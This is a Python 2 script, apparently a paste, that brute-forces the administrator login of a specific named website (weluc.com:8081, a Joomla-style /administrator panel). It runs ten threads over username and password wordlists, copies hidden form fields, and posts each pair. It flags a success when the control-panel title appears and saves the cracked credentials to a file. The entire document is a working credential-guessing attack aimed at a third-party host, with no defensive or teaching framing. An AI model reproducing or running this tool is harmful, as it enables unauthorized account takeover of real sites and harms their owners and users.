import urllib2import urllibimport cookielibimport threadingimport Queue

1. import urllib2
2. import urllib
3. import cookielib
4. import threading
5. import Queue
6. import sys
7. from HTMLParser import HTMLParser
8. import time
9.  
10. '''
11. 1. Request page accept all cookies
12. 2. parse HTML form elements
13. 3. set username password of POST
14. 4. make POST to login processing script iclude HTML form elements and our stored cookies
15. 5. check for success
16. '''
17.  
18. # gen info
19. n_threads = 10
20. username = "user.txt"
21. pass_list = "pass.txt"
22. results = "results.txt"
23. true = 'True'
24. wordQueue = Queue.Queue()
25.  
26. # target info
27. target_url = "http://weluc.com:8081/administrator/index.php"
28. target_POST = "http://weluc.com:8081/administrator/index.php"
29.  
30. # target fields
31. uField = "username"
32. pField = "passwd"
33.  
34. #check for success
35. check = "Administration - Control Panel"
36. #store correct passwords
37. correctPsd = []
38.  
39. class bruteParser(HTMLParser):
40.     def __init__(self):
41.         HTMLParser.__init__(self)
42.         self.tag_results = {}
43.  
44.     def handle_starttag(self, tag, attrs):
45.         if tag == "input":
46.             tag_name = None
47.             tag_value = None
48.             for name, value in attrs:
49.                 if name == "name":
50.                     tag_name = value
51.                 if name == "value":
52.                     tag_value = value
53.             if tag_name is not None:
54.                 self.tag_results[tag_name] = tag_value
55.  
56.  
57. class Brute():
58.     def __init__(self, words):
59.         self.words = words
60.         self.found = False
61.         self.whoIsRunning = []
62.     def run(self):
63.         for i in range(n_threads):
64.             t = threading.Thread(target=self.brute_attempt, args=(i + 1,))
65.             self.whoIsRunning.append(True)
66.             t.start()
67.  
68.     #creates results.txt
69.     def writeFile(self):
70.         othersRunning = True
71.         print "output ready"
72.         sys.stdout.flush()
73.         f = open(results, "w")
74.         while True in self.whoIsRunning == True:
75.             try:
76.                 outputWord = wordQueue.get(block=True, timeout=1)
77.                 print "wrote to file"
78.                 sys.stdout.flush()
79.                 f.write(str(outputWord))
80.             except Exception, e:
81.                 pass
82.                 sys.stdout.flush()
83.         f.close()
84.         print 'writing terminated'
85.         sys.stdout.flush()
86.  
87.     #handles HTTP requests and cookies
88.     def brute_attempt(self, number):
89.         self.number = number
90.         if self.words.empty():
91.             print "thread %s terminated"%(number,)
92.             sys.stdout.flush()
93.             self.whoIsRunning.pop()
94.             #print self.whoIsRunning
95.             #sys.stdout.flush()
96.             return
97.  
98.         while not self.words.empty():
99.             #othersRunning = True
100.             unamePass = self.words.get()
101.  
102.             jar = cookielib.FileCookieJar("cookies")
103.  
104.             opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
105.             opener.addheadder = [("User-Agent", "Mozilla/5.0 (Windows NT 6.3; WOW64)")]
106.             try:
107.                 response = opener.open(target_url, timeout=10)
108.  
109.                 page = response.read()
110.  
111.                 msg = '[*]Thread %s > %s | %s > Atempts remaining: %s\n' % (number, unamePass[0], unamePass[1], self.words.qsize())
112.                 sys.stdout.write(msg)
113.                 sys.stdout.flush()
114.  
115.                 parser = bruteParser()
116.                 parser.feed(page)
117.                 ptags = parser.tag_results
118.                
119.                 ptags[uField] = unamePass[0]
120.                 ptags[pField] = unamePass[1]
121.  
122.                 pdata = urllib.urlencode(ptags)
123.  
124.                 response = opener.open(target_POST, pdata)
125.                 result = response.read()
126.              
127.  
128.                 if check in result:
129.                     #self.found = True
130.                     msg = "[!]Success! Username: %s | Password: %s\n" % (unamePass[0], unamePass[1])
131.                     sys.stdout.write(msg)
132.                     sys.stdout.flush()
133.                     wordQueue.put(unamePass)
134.  
135.             except Exception, e:
136.                 raise e
137.                 self.words.put(unamePass)
138.  
139.         print "thread %s terminated"%(number,)
140.         self.whoIsRunning.pop()
141.         print self.whoIsRunning
142.         sys.stdout.flush()
143.  
144.  
145. def main():
146.     words = Queue.Queue()
147.     try:
148.         f = open(pass_list, "r")
149.         passwords = f.readlines()
150.         f.close()
151.         f = open(username, "r")
152.         usernames = f.readlines()
153.         f.close()
154.     except:
155.         print'[!] Could not open file. \n Exiting...'
156.         sys.exit()
157.     for uname in usernames:
158.         uname = uname.rstrip()
159.         for passwd in passwords:
160.             passwd = passwd.rstrip()
161.             words.put((uname, passwd))
162.  
163.     thing = Brute(words)
164.  
165.     thing.run()
166.     while len(thing.whoIsRunning) != 0:
167.         time.sleep(1)
168.     thing.writeFile()
169.  
170. if __name__ == '__main__':
171.     main()